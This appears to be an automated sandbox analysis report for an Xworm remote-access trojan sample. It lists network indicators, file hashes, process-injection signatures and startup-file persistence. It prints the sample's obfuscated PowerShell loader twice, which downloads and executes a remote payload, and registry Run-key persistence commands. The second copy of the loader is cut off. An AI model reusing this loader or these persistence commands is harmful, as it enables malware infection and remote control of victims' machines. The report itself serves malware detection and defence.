"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Polytyped = 1;$Chylification253='Sub';$Chylification253+='strin';$Chylification253+='g';Function alcoholist($Perissodactylous181){$Midwestward=$Perissodactylous181.Length-$Polytyped;For($Interventionisme=5;$Interventionisme -lt $Midwestward;$Interventionisme+=6){$Prveballoner+=$Perissodactylous181.$Chylification253.Invoke( $Interventionisme, $Polytyped);}$Prveballoner;}function Compulsed($Unmurmuringly74){& ($Besindet) ($Unmurmuringly74);}$Deltidsarbejderes=alcoholist 'AdfrdMTick,o RuntzBo meiK.dgel,ricllco,naa.leje/Unstr5 Lyop.As.le0Fors, Hu tk(Pl ttWGravei.anknnUafkld DennoHelssw,ascisCaddi JestiNTrassTLugtf .ardi1Papsv0Ndudg.Bidra0Drift;Afsni eapaW AmpuiSubson Proc6 Doso4Tr,pl;S,oke OdontxExecu6Goggl4Sca.r;,agso Bi,cerLustfvShirt:gulso1Mon.c2Dales1 Note.Frpla0C nte)Efter kabakGProvieMacrocBortrkE.piroD,ocl/ H,lf2Forin0 Stab1Sybot0 j.mb0 Njag1Ry,de0Opdag1Wordm Pan,eFBestiistuder StakeSte mfPremioGua hxLoyal/Waitl1Re,li2Immig1 Stvn.Slang0 Suit ';$Tjekkoslovaks=alcoholist 'Lo,gsUOutblsNedb,eJulehrSvi e-TelefA M xigForsieRebr.nIsos.tCount ';$Ingester=alcoholist 'ReliehFrys,tParletTilskp IntrsTelef: Back/Prep./Gen,edFlskee Hjt,.Plagih .ndke U.ioaFiflel.ataetFejlthStemma Ube n TierdAvls wDam.se Rotulafmagl SusunForsaeakutbsMakefs Kj.rbI terlKrmmeoKneblg Elgk. LignzRemiga Hje,.Ben,oc SstroForham Jepp/tuttycGynaev Spdb/P uffTFredej HarreLlebrn SmaaeSinnesKo.ib.P.intrOptimagest,rRdder ';$Physicobiological=alcoholist 'Desil>Su.id ';$Besindet=alcoholist 'Un eritranseGluerxa ema ';$Partiapparat='Tylen';$Cobolkommandoen = alcoholist 'In ele.algfcMalkohEndocoUnsk. Bob e%,doriaHo.nipBerigpSkaffd SardaAntimt,niffaTilbe%forb \Car.ubBronteRoccehpneumi prain UnistUnac,. Fosts wee hUnanir Inte Br,e&Plast&Jungm Mus,ie EcumcDemerh Ves oL tin aut,dtBedla ';Compulsed (alcoholist 'P.eno$ Ermig Sto l PhleoSki,lbGlassa B tel Time:EfterA .sopnpuffeoSiv,ttHydriuSignasAmbus=Earta(SumpecrimndmBowpidTurgo Rumv,/Telegc Lund Ra.l$ SubdCnaturo BesnbThoraoSkiltlMrskbkForfroTarifm.lotsmMorakaSkrydn esildTilsuoIntr,eDramanDiony)Pahse ');Compulsed (alcoholist 'L.sse$Trnaag BrdrlCentroParthbSkrida myxol Over: U,skSKanw.kNegabo exosvS.rpae Ex,rrOblan=Ges,f$Dob eIInd tn C,apgFe,rieligamsLsnintFog,de,uxemrelect.ApplisSedimp UdgrlBanksiY,gintMonoc(Pseu $InddrPBrutthDuvetyPrefisMetati F decBakkeo.incsbForesi RenvoP,sfolMetadoFleetgIagtti GryrcAbandaPrivalDou.h)Amage ');$Ingester=$Skover[0];$Rejnhards= (alcoholist 's.otc$EmbrygEneullGrovvo Bowdbvurdeap ntol drib:Ghe.tD.narmyWithisHaptetKrum sM.lin= MajoNStarteC.vilwLrker-OpbygOb,rebb Hyd,jPre.ee .jercKorrit Trn, DimerSTribeyPimpes urntPrevieZ,omamGranu.zetacNColiaeBlephtSa.ro..nferWAdv,keSamirb Kvr,CIndkvlFa heibrnefeRegulnMenigt');$Rejnhards+=$Anotus[1];Compulsed ($Rejnhards);Compulsed (alcoholist 'Udrre$SkokkD MiggyBioscsDugwatStatesUb.ry.HjlpeHNoseaeConfeaSand dVrneteTrivirSend.s .eas[Sagso$GadedT,otpojU,caje Aba.k icrok vandohypers BejdlThumpoTaarevterriaFa,iakBr,tnsC.lur]Buksh= Ggle$ KampDIncone emopl DecatMongoiBazoodGldess Af.oaGr mmrMarqubBloodegeonijLixend StereTr,sarBananep,efesSprut ');$Necrologies=alcoholist ' Afsy$KlumpDHove y DriksSinditBa,ersd sko..emorDMorsooDioptwS rkenIflg,lAeggeoorgana Cou.dVideoFDimaniMoonslgrecieGyres(Aflbs$ AediI .ndinGodsvgBesk.e S,hlsHearttDat,beRaastrSkatt,.anef$Dvrg,CStra,h CrypiDybstlJurisi esvrfDetekr HealuJor,sgFirmatJe.hueInsp rSporanR deleephras Stik)under ';$Chilifrugternes=$Anotus[0];Compulsed (alcoholist 'Domin$ Photgmaanel PreroAsyn.b,rdaga.ebenlObad.: raisMRespiePe rtrIna.tg .lufe ,romnKatascAntyde A.ko= Rede(RegnsT,arkeePapulsChanct Ap l- Du.iPAfg.vaRadiot ishbhColou Sa.au$ ngreCValglhB nitiHa,ynlVermii.ejlbf Tr nrTava,u rovkgSkibitRegureGstesrMadssnUn.ire DesisCrust) Okia ');while (!$Mergence) {Compulsed (alcoholist ' ,ulp$ Sireg,ravel,pirioUnilobJordoaMineslDiplo: agaB FejlrCenoboBrevswApulinSouthnFrifue ,lies Spi,sHorne1Overd2Sy,hi5K ffe=Opp,s$SacchtAnemorPantouUndupe,mpre ') ;Compulsed $Necrologies;Compulsed (alcoholist 'FredeS BoxftUd rma Udsor Skr,tPres,-Pol.gSAfgaslPrel eMeroce MisapAgerh Carin4Comic ');Compulsed (alcoholist ' S il$.ettigHandllRelenoDriftbTaskmaafskilCit,r:Bge oMCon eeVrng,r hartgTilkoeSprlln UdskcHy,pee ,her=Broek(BludgTNoncoeBrugesGym.ot ,egn-premoPlysteaGrofttInkomhFarve Ramad$MelinCOmegnhExtr icharml Sha.iKorrefMecharBrumbuD,lesgImportafsaaeKristrTan.hnYelleeKrystsenden)Decis ') ;Compulsed (alcoholist 'Count$C thogR odilInitioHyldebLo.enaFest.lRanin:Im.unUHighbnHom gmBrod.e nbeadPoet,iblodscRigsaiUnrefnMar eaProgrlRimta=Obsti$L.nglg.dsaglcertioR darb FantaPerislKnobn:Tmrerf orcioBolomr,arunkReforoSw,gsnTilvetSelsko.rugtr Lufte In.ttPodge+ Fora+Sterl% S.ov$retveSSun.hk K,pioBeativ HoejePre trT ope.Midt.c K nno Con u Ove.nAntistDet,i ') ;$Ingester=$Skover[$Unmedicinal];}$Tash=309240;$Frugtsukkerets=29256;Compulsed (alcoholist 'Kinas$PrimagMeta lPneumoUpfrobTrikoaAtriulAutog: ,orfHUrb,teNedspmOrkano BlastYmpnir Ptero basipEndevhIsseseSkill Isoqu=,ende AgatGCheireKokettreada-KardsCKontioIn.cunW,vectStaaleAl.opnEricat p.es Sc,ll$HomesCPedogh Ha.diSyn.elP.ngeiSlfanf Helir.praau Consgs.pert,akkeeLum nr GratnDomajeNath,s Snel ');Compulsed (alcoholist 'Boble$PrecogS adel Cr.soSemanbDesoraSputtlTrigo:NatioMopve.e InfetCo,iiaAp.erlHa.pbsLa.tikLysteaHo chbinc.ee imancoachevekslsStere Delet=Bedca Unsha[.ydetSB,lllyIndissLedd.tB.gnie Eli mMisda.AdephCSpiraoSacchnPrer.v lageeAfstnrUendetProbl]Sport: R,ak:Pl,nsF Conkr Di,coLamiamUnderBKrickaForsksAc.dieRev s6Arsen4ByrliSSterotDietar Meetisyst.n,alengFrems(Skfte$BatalHA,lgseTaf,emAlib,oCha ttuns rrLkkero,yttep Un.ohReexaeSurp ) Klav ');Compulsed (alcoholist ' Tre.$SalvngN nvalBuffeoBhenvbKlassa Undelreg,d:SmaasWR.touhDagafe D tuyFil,deFogyiy,hill Sirre=act v Super[ Sho.SKendeyDenunsCaprytKontrePreanmsolv,.PadgeTGaarde Grafx W.urtSnder.Optr EElegyn VerdcOx daoFootsd AnsgiPeewen K psgF lke] Beta: bran:.alynAAlderS,ollyCIndleIBilioISlren.TreetG ParaeGo iottilliSca.iatOctaprPelariGae.tnNondegOver.(Enigm$F lmcMNoneneDi.uct .aliaDaginlConses,orgrk lan augrisb etaleObjeknContieH eresMo um) Syre ');Compulsed (alcoholist 'Sange$NonthgMi.tnl No coFou,ab Schaa Vrell V rm: chorEKons lEnn.svVa beiBargonSt reaPre.n=Medal$ DetaWMedlehSkdete.lethyKomiteFerskyH,dro.Mon.bsT,ansu ResebReinesRe.letFluesrDressiFlaglnTrencgIn.vi(,ancr$IndusTHome.aHderss.kifthLseti,Testu$ StamFTorskrDisseuJobbegB.sint,aaobsZymoluPerknkJ,hankAtomseT lpir CatheDefortRejeksAchro)Sanit ');Compulsed $Elvina;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\behint.shr && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Nonharmoniousness171% -w 1 $Acetonen=(Get-ItemProperty -Path 'HKCU:\ledelsessystemets\').Hovedstillingers;%Nonharmoniousness171% ($Acetonen)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Nonharmoniousness171% -w 1 $Acetonen=(Get-ItemProperty -Path 'HKCU:\ledelsessystemets\').Hovedstillingers;%Nonharmoniousness171% ($Acetonen)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 mayxw9402.duckdns.org udp
US 12.221.146.138:9402 mayxw9402.duckdns.org tcp
US 8.8.8.8:53 138.146.221.12.in-addr.arpa udp
US 8.8.8.8:53 de.healthandwellnessblog.za.com udp
AU 154.26.154.116:443 de.healthandwellnessblog.za.com tcp
US 8.8.8.8:53 116.154.26.154.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 joccupationalscience.org udp
AU 185.184.154.17:443 joccupationalscience.org tcp
US 8.8.8.8:53 17.154.184.185.in-addr.arpa udp
US 8.8.8.8:53 80.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 28.73.42.20.in-addr.arpa udp

Files

memory/5064-0-0x00007FF9F8B43000-0x00007FF9F8B45000-memory.dmp

memory/5064-1-0x00000000005F0000-0x0000000000600000-memory.dmp

memory/5064-6-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmwugm.vbs

MD5 c6ea093c28624fba97ebea592736640c
SHA1 b989c4f2377c8cb0e362b0ad96238194ae0e534a
SHA256 4c50875efb6badccfe526c866dab42b2f6a40e8a490e1cb6119020ed4849dbce
SHA512 3194847043a76863b583bc386a3e90443132b18de9563ac98d940f22d9fd61c39109008ccd1f92fc2a3b05e3815998a62abfc820ec0e8b2c14a41d009bd51f58

memory/5064-11-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp

memory/4428-13-0x000002C4AD530000-0x000002C4AD552000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g3py32c1.hla.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1756-24-0x0000000003040000-0x0000000003076000-memory.dmp

memory/1756-25-0x0000000005BE0000-0x0000000006208000-memory.dmp

memory/1756-26-0x0000000005AD0000-0x0000000005AF2000-memory.dmp

memory/1756-27-0x00000000062C0000-0x0000000006326000-memory.dmp

memory/1756-28-0x0000000006330000-0x0000000006396000-memory.dmp

memory/1756-38-0x00000000064E0000-0x0000000006834000-memory.dmp

memory/1756-39-0x0000000006970000-0x000000000698E000-memory.dmp

memory/1756-40-0x00000000069A0000-0x00000000069EC000-memory.dmp

memory/1756-41-0x00000000081B0000-0x000000000882A000-memory.dmp

memory/1756-42-0x0000000006F10000-0x0000000006F2A000-memory.dmp

memory/1756-43-0x0000000007C70000-0x0000000007D06000-memory.dmp

memory/1756-44-0x0000000007BD0000-0x0000000007BF2000-memory.dmp

memory/1756-45-0x0000000008DE0000-0x0000000009384000-memory.dmp

C:\Users\Admin\AppData\Roaming\behint.shr

MD5 bf49435216b596110f42c8cf49e9ff88
SHA1 1311c671bf48e4021d3b152b6d843eb2fb712cc6
SHA256 d2f505d87f1458187860f7d4b0605963ea921635b3cb9ce4825b92e5c86c3d14
SHA512 9b66cac0a87809a1e63c59c9f1c430c1b5af30ddd27f0b6c2d93de8381bf764c96093384b8f67ce970ef46a589bfebce4b9ff7444b512bcd6132de82eb011e7f

memory/1756-47-0x0000000009390000-0x000000000A8BD000-memory.dmp

memory/3580-55-0x0000000001000000-0x0000000002254000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3582-490\wab.exe

MD5 72ad21d191b58842334d32a381ea7fa8
SHA1 f7375f09855a7bce9f7a152c75e84aac69caf828
SHA256 87abfab7bf5e213fc9e63c7fa39edfa6452eb5f7fdd668cd370d9cf4ea3ef729
SHA512 78662231c7ce0d03374b69dfd32614786dc5bf0c8ad2baadf2143f42bb03bd378632cc457dc414aa7e3d284674cc9151c39f90d71d9a5dd15dba689b2283386d

C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE

MD5 0a1704e48ff603332eaac935608d3cf1
SHA1 e138d3d481c054a89b85312bfddd2f8a0baf8c1b
SHA256 d9e02af7b220e25f385c71e0a3be4b83203e0673cc1e56fcf02d3e1f0f3774b6
SHA512 7cec7a7c5542e66e347381e9ab5572b2231ab11dac61d9a76bcb7cbd4bd1e86f8169e7840c2e69f93e686cc1834e52cd6b47817b760ea618139a3de64076314f

memory/3580-130-0x0000000001000000-0x0000000002254000-memory.dmp

memory/3580-156-0x0000000001000000-0x0000000002254000-memory.dmp

memory/3580-157-0x0000000001000000-0x0000000002254000-memory.dmp

memory/3580-159-0x0000000001000000-0x0000000002254000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-21 03:48

Reported

2024-05-21 03:51

Platform

win7-20240508-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.lnk C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.lnk C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1716 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe C:\Windows\System32\WScript.exe
PID 1716 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe C:\Windows\System32\WScript.exe
PID 1716 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe C:\Windows\System32\WScript.exe
PID 1916 wrote to memory of 2848 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1916 wrote to memory of 2848 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1916 wrote to memory of 2848 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2848 wrote to memory of 1848 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2848 wrote to memory of 1848 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2848 wrote to memory of 1848 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe

"C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\qyohla.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Polytyped = 1;$Chylification253='Sub';$Chylification253+='strin';$Chylification253+='g';Function alcoholist($Perissodactylous181){$Midwestward=$Perissodactylous181.Length-$Polytyped;For($Interventionisme=5;$Interventionisme -lt $Midwestward;$Interventionisme+=6){$Prveballoner+=$Perissodactylous181.$Chylification253.Invoke( $Interventionisme, $Polytyped);}$Prveballoner;}function Compulsed($Unmurmuringly74){& ($Besindet) ($Unmurmuringly74);}$Deltidsarbejderes=alcoholist 'AdfrdMTick,o RuntzBo meiK.dgel,ricllco,naa.leje/Unstr5 Lyop.As.le0Fors, Hu tk(Pl ttWGravei.anknnUafkld DennoHelssw,ascisCaddi JestiNTrassTLugtf .ardi1Papsv0Ndudg.Bidra0Drift;Afsni eapaW AmpuiSubson Proc6 Doso4Tr,pl;S,oke OdontxExecu6Goggl4Sca.r;,agso Bi,cerLustfvShirt:gulso1Mon.c2Dales1 Note.Frpla0C nte)Efter kabakGProvieMacrocBortrkE.piroD,ocl/ H,lf2Forin0 Stab1Sybot0 j.mb0 Njag1Ry,de0Opdag1Wordm Pan,eFBestiistuder StakeSte mfPremioGua hxLoyal/Waitl1Re,li2Immig1 Stvn.Slang0 Suit ';$Tjekkoslovaks=alcoholist 'Lo,gsUOutblsNedb,eJulehrSvi e-TelefA M xigForsieRebr.nIsos.tCount ';$Ingester=alcoholist 'ReliehFrys,tParletTilskp IntrsTelef: Back/Prep./Gen,edFlskee Hjt,.Plagih .ndke U.ioaFiflel.ataetFejlthStemma Ube n TierdAvls wDam.se Rotulafmagl SusunForsaeakutbsMakefs Kj.rbI terlKrmmeoKneblg Elgk. LignzRemiga Hje,.Ben,oc SstroForham Jepp/tuttycGynaev Spdb/P uffTFredej HarreLlebrn SmaaeSinnesKo.ib.P.intrOptimagest,rRdder ';$Physicobiological=alcoholist 'Desil>Su.id ';$Besindet=alcoholist 'Un eritranseGluerxa ema ';$Partiapparat='Tylen';$Cobolkommandoen = alcoholist 'In ele.algfcMalkohEndocoUnsk. Bob e%,doriaHo.nipBerigpSkaffd SardaAntimt,niffaTilbe%forb \Car.ubBronteRoccehpneumi prain UnistUnac,. Fosts wee hUnanir Inte Br,e&Plast&Jungm Mus,ie EcumcDemerh Ves oL tin aut,dtBedla ';Compulsed (alcoholist 'P.eno$ Ermig Sto l PhleoSki,lbGlassa B tel Time:EfterA .sopnpuffeoSiv,ttHydriuSignasAmbus=Earta(SumpecrimndmBowpidTurgo Rumv,/Telegc Lund Ra.l$ SubdCnaturo BesnbThoraoSkiltlMrskbkForfroTarifm.lotsmMorakaSkrydn esildTilsuoIntr,eDramanDiony)Pahse ');Compulsed (alcoholist 'L.sse$Trnaag BrdrlCentroParthbSkrida myxol Over: U,skSKanw.kNegabo exosvS.rpae Ex,rrOblan=Ges,f$Dob eIInd tn C,apgFe,rieligamsLsnintFog,de,uxemrelect.ApplisSedimp UdgrlBanksiY,gintMonoc(Pseu $InddrPBrutthDuvetyPrefisMetati F decBakkeo.incsbForesi RenvoP,sfolMetadoFleetgIagtti GryrcAbandaPrivalDou.h)Amage ');$Ingester=$Skover[0];$Rejnhards= (alcoholist 's.otc$EmbrygEneullGrovvo Bowdbvurdeap ntol drib:Ghe.tD.narmyWithisHaptetKrum sM.lin= MajoNStarteC.vilwLrker-OpbygOb,rebb Hyd,jPre.ee .jercKorrit Trn, DimerSTribeyPimpes urntPrevieZ,omamGranu.zetacNColiaeBlephtSa.ro..nferWAdv,keSamirb Kvr,CIndkvlFa heibrnefeRegulnMenigt');$Rejnhards+=$Anotus[1];Compulsed ($Rejnhards);Compulsed (alcoholist 'Udrre$SkokkD MiggyBioscsDugwatStatesUb.ry.HjlpeHNoseaeConfeaSand dVrneteTrivirSend.s .eas[Sagso$GadedT,otpojU,caje Aba.k icrok vandohypers BejdlThumpoTaarevterriaFa,iakBr,tnsC.lur]Buksh= Ggle$ KampDIncone emopl DecatMongoiBazoodGldess Af.oaGr mmrMarqubBloodegeonijLixend StereTr,sarBananep,efesSprut ');$Necrologies=alcoholist ' Afsy$KlumpDHove y DriksSinditBa,ersd sko..emorDMorsooDioptwS rkenIflg,lAeggeoorgana Cou.dVideoFDimaniMoonslgrecieGyres(Aflbs$ AediI .ndinGodsvgBesk.e S,hlsHearttDat,beRaastrSkatt,.anef$Dvrg,CStra,h CrypiDybstlJurisi esvrfDetekr HealuJor,sgFirmatJe.hueInsp rSporanR deleephras Stik)under ';$Chilifrugternes=$Anotus[0];Compulsed (alcoholist 'Domin$ Photgmaanel PreroAsyn.b,rdaga.ebenlObad.: raisMRespiePe rtrIna.tg .lufe ,romnKatascAntyde A.ko= Rede(RegnsT,arkeePapulsChanct Ap l- Du.iPAfg.vaRadiot ishbhColou Sa.au$ ngreCValglhB nitiHa,ynlVermii.ejlbf Tr nrTava,u rovkgSkibitRegureGstesrMadssnUn.ire DesisCrust) Okia ');while (!$Mergence) {Compulsed (alcoholist ' ,ulp$ Sireg,ravel,pirioUnilobJordoaMineslDiplo: agaB FejlrCenoboBrevswApulinSouthnFrifue ,lies Spi,sHorne1Overd2Sy,hi5K ffe=Opp,s$SacchtAnemorPantouUndupe,mpre ') ;Compulsed $Necrologies;Compulsed (alcoholist 'FredeS BoxftUd rma Udsor Skr,tPres,-Pol.gSAfgaslPrel eMeroce MisapAgerh Carin4Comic ');Compulsed (alcoholist ' S il$.ettigHandllRelenoDriftbTaskmaafskilCit,r:Bge oMCon eeVrng,r hartgTilkoeSprlln UdskcHy,pee ,her=Broek(BludgTNoncoeBrugesGym.ot ,egn-premoPlysteaGrofttInkomhFarve Ramad$MelinCOmegnhExtr icharml Sha.iKorrefMecharBrumbuD,lesgImportafsaaeKristrTan.hnYelleeKrystsenden)Decis ') ;Compulsed (alcoholist 'Count$C thogR odilInitioHyldebLo.enaFest.lRanin:Im.unUHighbnHom gmBrod.e nbeadPoet,iblodscRigsaiUnrefnMar eaProgrlRimta=Obsti$L.nglg.dsaglcertioR darb FantaPerislKnobn:Tmrerf orcioBolomr,arunkReforoSw,gsnTilvetSelsko.rugtr Lufte In.ttPodge+ Fora+Sterl% S.ov$retveSSun.hk K,pioBeativ HoejePre trT ope.Midt.c K nno Con u Ove.nAntistDet,i ') ;$Ingester=$Skover[$Unmedicinal];}$Tash=309240;$Frugtsukkerets=29256;Compulsed (alcoholist 'Kinas$PrimagMeta lPneumoUpfrobTrikoaAtriulAutog: ,orfHUrb,teNedspmOrkano BlastYmpnir Ptero basipEndevhIsseseSkill Isoqu=,ende AgatGCheireKokettreada-KardsCKontioIn.cunW,vectStaaleAl.opnEricat p.es Sc,ll$HomesCPedogh Ha.diSyn.elP.ngeiSlfanf Helir.praau Consgs.pert,akkeeLum nr GratnDomajeNath,s Snel ');Compulsed (alcoholist 'Boble$PrecogS adel Cr.soSemanbDesoraSputtlTrigo:NatioMopve.e InfetCo,iiaAp.erlHa.pbsLa.tikLysteaHo chbinc.ee imancoachevekslsStere Delet=Bedca Unsha[.ydetSB,lllyIndissLedd.tB.gnie Eli mMisda.AdephCSpiraoSacchnPrer.v lageeAfstnrUendetProbl]Sport: R,ak:Pl,nsF Conkr Di,coLamiamUnderBKrickaForsksAc.dieRev s6Arsen4ByrliSSterotDietar Meetisyst.n,alengFrems(Skfte$BatalHA,lgseTaf,emAlib,oCha ttuns rrLkkero,yttep Un.ohReexaeSurp ) Klav ');Compulsed (alcoholist ' Tre.$SalvngN nvalBuffeoBhenvbKlassa Undelreg,d:SmaasWR.touhDagafe D tuyFil,deFogyiy,hill Sirre=act v Super[ Sho.SKendeyDenunsCaprytKontrePreanmsolv,.PadgeTGaarde Grafx W.urtSnder.Optr EElegyn VerdcOx daoFootsd AnsgiPeewen K psgF lke] Beta: bran:.alynAAlderS,ollyCIndleIBilioISlren.TreetG ParaeGo iottilliSca.iatOctaprPelariGae.tnNondegOver.(Enigm$F lmcMNoneneDi.uct .aliaDaginlConses,orgrk lan augrisb etaleObjeknContieH eresMo um) Syre ');Compulsed (alcoholist 'Sange$NonthgMi.tnl No coFou,ab Schaa Vrell V rm: 